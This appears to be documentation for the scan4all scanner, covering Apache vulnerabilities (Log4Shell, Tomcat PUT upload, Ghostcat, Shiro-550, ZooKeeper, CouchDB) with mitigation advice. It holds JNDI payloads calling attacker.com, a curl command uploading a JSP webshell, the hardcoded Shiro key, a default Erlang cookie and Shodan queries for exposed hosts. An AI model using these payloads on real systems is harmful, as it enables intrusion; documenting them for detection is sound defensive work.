Skip to main content

Overview

Apache Software Foundation produces many widely-used open source projects. scan4all includes POCs for critical vulnerabilities in Apache Log4j, Tomcat, Shiro, ZooKeeper, and CouchDB.

Log4j

Log4Shell RCE

Tomcat

File Upload & Read

Shiro

Deserialization RCE

ZooKeeper

Unauthorized Access

CouchDB

RCE & DoS

Apache Log4j

CVE-2021-44228 - Log4Shell

CVE-2021-44228 (Log4Shell)

TypeRemote Code Execution
Affected Versions2.0 - 2.14.1
Discovery DateDecember 2021
CVSS Score10.0 (Critical)
ImpactWorldwide - Millions of systems
Description: Log4Shell is one of the most critical vulnerabilities ever discovered. It allows unauthenticated remote code execution via JNDI injection in logged messages. The vulnerability is trivial to exploit and affects countless Java applications. Exploitation: 
// Vulnerable code
logger.info("User: " + userInput);

// Malicious input
${jndi:ldap://attacker.com/exploit}
Common Attack Vectors:
  • HTTP headers (User-Agent, X-Forwarded-For)
  • Form inputs
  • API parameters
  • Any logged user input
Detection Method: 
# DNS callback detection
curl -H "User-Agent: ${jndi:ldap://test.dnslog.cn/a}" http://target

# HTTP callback
curl -H "X-Api-Version: ${jndi:ldap://attacker.com:1389/Basic/Command/calc}" http://target
Payloads: 
${jndi:ldap://attacker.com/a}
Mitigation:
1

Upgrade Immediately

Update to Log4j 2.17.1 or later (2.16.0 has bypass)
2

Set JVM Property

-Dlog4j2.formatMsgNoLookups=true (partial mitigation)
3

Remove JndiLookup Class

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
4

WAF Rules

Block requests containing ${jndi: in headers and parameters
Source: pocs_go/log4j/check.go

Apache Tomcat

CVE-2017-12615 - PUT Method File Upload

CVE-2017-12615

TypeArbitrary File Upload
Affected Versions7.0.0 - 7.0.81
Discovery DateSeptember 2017
CVSS Score8.1 (High)
Description: When running on Windows with HTTP PUT enabled and configured with readonly=false, Tomcat allows uploading arbitrary files including JSP webshells. Requirements:
  • Windows operating system
  • HTTP PUT method enabled
  • readonly parameter set to false
Exploitation: 
# Upload a test file
curl -X PUT http://target/vtset.txt -d "test content"

# Upload JSP webshell
curl -X PUT http://target/shell.jsp/ -d "<% Runtime.getRuntime().exec(request.getParameter('cmd')); %>"
Bypass Technique: 
# Trailing slash or special characters
PUT /shell.jsp/
PUT /shell.jsp::
PUT /shell.jsp%20
Source: pocs_go/tomcat/CVE_2017_12615.go

CVE-2020-1938 - Ghostcat (AJP File Read)

CVE-2020-1938 (Ghostcat)

TypeArbitrary File Read / RCE
Affected Versions6.x, 7.x < 7.0.100, 8.x < 8.5.51, 9.x < 9.0.31
Discovery DateFebruary 2020
CVSS Score9.8 (Critical)
Default Port8009 (AJP)
Description: Ghostcat exploits the AJP (Apache JServ Protocol) connector to read arbitrary files from the server, including configuration files with credentials. Can also be leveraged for RCE by uploading files via PUT. Attack Scenarios:
1

File Read

Read web.xml, configuration files, source code
2

Credential Theft

Extract database credentials and secrets
3

File Upload + Read = RCE

Upload malicious file via CVE-2017-12615, then read/execute it
Exploitation: 
# Read web.xml
AJP request to read /WEB-INF/web.xml

# Common targets
/WEB-INF/web.xml
/WEB-INF/classes/application.properties
/etc/passwd
Source: pocs_go/tomcat/CVE_2020_1938.go

Apache Shiro

CVE-2016-4437 - Shiro-550 Deserialization RCE

CVE-2016-4437 (Shiro-550)

TypeDeserialization RCE
Affected Versions1.2.4 and earlier
Discovery Date2016
CVSS Score8.1 (High)
Alternative NameShiro-550
Description: Apache Shiro uses a hardcoded encryption key to encrypt the “rememberMe” cookie. Attackers can decrypt the cookie, inject malicious serialized objects, re-encrypt with the known key, and achieve remote code execution. Technical Details:
  • Component: RememberMe functionality
  • Encryption: AES with CBC mode
  • Known Key: kPH+bIxk5D2deZiIxcaaaA== (Base64)
  • Attack: Java deserialization with gadget chains
Exploitation Process:
1

Generate Payload

Create malicious Java object using CommonCollections or CommonsBean
2

Serialize

Serialize the payload object
3

Encrypt

Encrypt with hardcoded AES key
4

Base64 Encode

Encode the encrypted payload
5

Send Cookie

Set as rememberMe cookie value
Detection: 
# Check for Shiro
curl -v http://target | grep "rememberMe=deleteMe"

# Check cookie attributes
Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=...
Gadget Chains:
  • Apache Commons Collections
  • Apache Commons Beanutils
  • Spring Framework
  • ROME
Source: pocs_go/shiro/CVE_2016_4437.go

Apache ZooKeeper

Unauthorized Access

ZooKeeper Unauthorized Access

TypeUnauthorized Access
Affected VersionsVarious (misconfigured)
Default Port2181
IssueNo authentication by default
Description: ZooKeeper does not enable authentication by default. Exposed ZooKeeper instances allow anyone to read and modify configuration data, potentially affecting distributed systems that rely on it. Impact:
  • Configuration tampering
  • Service disruption
  • Information disclosure
  • Cluster manipulation
Detection: 
# Connect to ZooKeeper
echo "ruok" | nc target 2181
# Response: imok

# List nodes
echo "dump" | nc target 2181

# Get stats
echo "stat" | nc target 2181
Shodan Query: 
port:2181 "zookeeper"
Source: pocs_go/apache/poc-go-zookeeper-unauth.go

Apache CouchDB

CVE-2022-24706

TypeRemote Code Execution
Affected VersionsCouchDB with exposed Erlang port
Discovery DateFebruary 2022
CVSS Score10.0 (Critical)
Port4369 (epmd), 5984 (CouchDB)
Description: CouchDB uses Erlang’s distributed computing features. If the Erlang Port Mapper Daemon (epmd) and Erlang node ports are exposed with default or weak cookies, attackers can execute arbitrary commands. Requirements:
  • Port 4369 (epmd) accessible
  • Erlang distribution port accessible
  • Default or known Erlang cookie
Default Cookie: monster Exploitation Process:
1

Query EPMD

Connect to port 4369 to discover Erlang nodes
2

Connect to Node

Connect to discovered Erlang node
3

Authenticate

Use default cookie to authenticate
4

Execute Commands

Use Erlang RPC to execute OS commands
Shodan Query: 
port:4369 "name couchdb at"
Source: pocs_go/apache/CVE-2022-24706.go

CVE-2020-13935 - WebSocket DoS

CVE-2020-13935

TypeDenial of Service
Affected VersionsVarious Apache products with WebSocket
Discovery DateJuly 2020
CVSS Score7.5 (High)
Description: WebSocket implementation vulnerability that causes payload length validation errors, leading to denial of service. Technical Details:
  • Malformed WebSocket frame with invalid length
  • Sets MSB to 1 in 64-bit length field
  • Violates WebSocket RFC specification
  • Causes server to allocate excessive memory
Source: pocs_go/apache/CVE-2020-13935.go

Usage

# Scan for all Apache vulnerabilities
scan4all -h http://target.com

# Focus on specific product
scan4all -h http://target.com -poc log4j
scan4all -h http://target.com -poc tomcat

# Test specific CVE
scan4all -h http://target.com -poc CVE-2021-44228

Detection Summary

VulnerabilityPortDetection Method
Log4j (Log4Shell)80, 443, AnyJNDI callback payload
Tomcat PUT Upload8080, 8443PUT request response code
Tomcat Ghostcat8009AJP protocol probe
Shiro-55080, 443RememberMe cookie check
ZooKeeper Unauth2181Protocol commands
CouchDB RCE4369, 5984+EPMD + Erlang probe

Mitigation Best Practices

Keep Updated

Apply security patches immediately for critical vulnerabilities

Minimize Exposure

Don’t expose management ports to the internet

Enable Authentication

Configure authentication for all services

Monitor Logs

Watch for exploitation attempts in logs

Source Code Location

pocs_go/
├── log4j/
│   ├── check.go
│   └── payloads.go
├── tomcat/
│   ├── CVE_2017_12615.go
│   └── CVE_2020_1938.go
├── shiro/
│   └── CVE_2016_4437.go
└── apache/
    ├── CVE-2020-13935.go
    ├── CVE-2022-24706.go
    └── poc-go-zookeeper-unauth.go

References

Apache products are ubiquitous in enterprise environments. Regular security assessments are critical.

Build docs developers (and LLMs) love

Get started for freeTalk to us